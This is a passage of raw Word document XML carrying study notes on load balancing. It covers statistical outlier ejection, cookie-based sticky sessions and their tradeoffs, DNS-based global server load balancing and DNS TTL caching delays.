      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Track each backend's error rate and response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17281297" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Compare to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>aggregate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> of all backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DF4F5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If one backend's error rate is statistically significantly worse than peers (e.g., &gt; mean + 2× standard deviation), eject it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B4D7E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why statistical comparison is better:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D28C997" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If all backends have 5% error rate, that's probably normal (maybe the client sends bad requests). But if one backend has 30% while others have 2%, something is wrong with THAT backend specifically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA987F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejection mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174916AF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Ejected for an exponentially increasing duration: first ejection = 30s, second = 60s, third = 120s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F7E32E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>After max ejection duration, server is re-included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D350F9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If it still misbehaves, ejected again with longer duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6448F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="0346FAC8">
          <v:rect id="_x0000_i2676" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15111591" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Session Persistence (Sticky Sessions) — How It Actually Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7519A4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Why Stickiness is Needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66658ABB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Stateful applications store per-user state on the server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60882630" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Shopping cart in server memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622DDBBF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Multi-step form wizard state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14542633" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>WebSocket connections (inherently sticky — it's a persistent connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A3702" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>In-memory caches warming up per-user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692D48AD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If a user's second request goes to a different server, their state is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A05EB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Cookie-Based Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D1BF84" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LB-generated cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD1F2B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>First request arrives. LB selects Server B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409183F8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB inserts a cookie in the response: Set-Cookie: SERVERID=server-b; Path=/; HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2980A8A5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Subsequent requests include this cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D29CD4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB reads the cookie, routes to Server B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D75784" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61454F5F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The cookie value might be encrypted (so clients can't tamper/guess server identities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02E96C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Cookie expiration controls how long the session is sticky (e.g., 1 hour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C19C03" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If Server B fails and the cookie still points to it, the LB must handle this: route to a new server and set a new cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138B1FBF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-generated cookie (e.g., JSESSIONID):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4D9137" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The application itself generates a session cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C8D8FA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB maintains a table: JSESSIONID=abc123 → Server B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3938BB2C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Advantage: works with existing application sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50716458" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Disadvantage: LB must store the mapping table (memory, state synchronization if LB is clustered).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29236A3F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 The Tradeoffs of Stickiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAFCA67" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Negative impacts on load balancing effectiveness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4B140" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uneven load distribution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> If "sticky user A" is an extremely active user, their pinned server gets disproportionate load. The LB can't rebalance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40CA4D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server failure impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> When Server B crashes, all its sticky users simultaneously lose their sessions. They might need to re-login, lose cart contents, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469DD4F2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling difficulty:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Adding a new server doesn't help existing users — they're stuck on old servers. Only new sessions utilize the new server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFF3430" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory pressure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Each server's memory grows with pinned sessions. Can't distribute this load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81DAF8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ideal solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Externalize state (Redis, Memcached) so any server can serve any user. But this requires application changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBA4B83" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="550F72F7">
          <v:rect id="_x0000_i2677" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EFBE54" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Global Server Load Balancing (GSLB) — Multi-Region Traffic Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056558E9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 DNS-Based Global Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10A58F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC1A4B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>User queries DNS for app.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767983B0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The authoritative DNS server is a GSLB-aware nameserver (e.g., Route 53, Cloudflare).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBDEBFA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The nameserver knows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712A52B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>User's location (from the DNS resolver's IP, or EDNS Client Subnet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31574A2C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Health status of each region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC554DE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Current load in each region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955D584" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Returns the IP of the optimal region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CECEF03" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Routing policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A1990" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Latency-based:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Route to region with lowest measured latency from the user's network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD36A20" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geographic:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Route EU users to EU region, US users to US region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9B2C09" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weighted:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Split traffic 70/30 between regions (useful for canary deployments across regions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF52A04" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failover:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Primary region unless unhealthy, then secondary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A599FA3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How latency measurement works (Route 53 example):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E154A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>AWS maintains a global network of health checkers. They periodically measure latency from various global locations to each region endpoint. When a DNS query comes from a known network range, Route 53 maps it to the measured latencies and returns the lowest-latency region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D93B95C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 The DNS TTL Problem — Why DNS-Based GSLB is Slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173AD378" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The caching chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF5C4A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Application caches DNS (JVM: default infinite, configurable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14577B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>OS resolver caches DNS (system-level, respects TTL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536CBFEE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Local DNS resolver (ISP or corporate) caches DNS (may not respect low TTLs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0BFAC9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Intermediate resolvers may cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0A504" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Even with 30-second TTL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E78CE7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Some resolvers enforce a minimum TTL (e.g., 300 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03155CE7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Some clients ignore TTL entirely.</w:t>
      </w:r>
    </w:p>
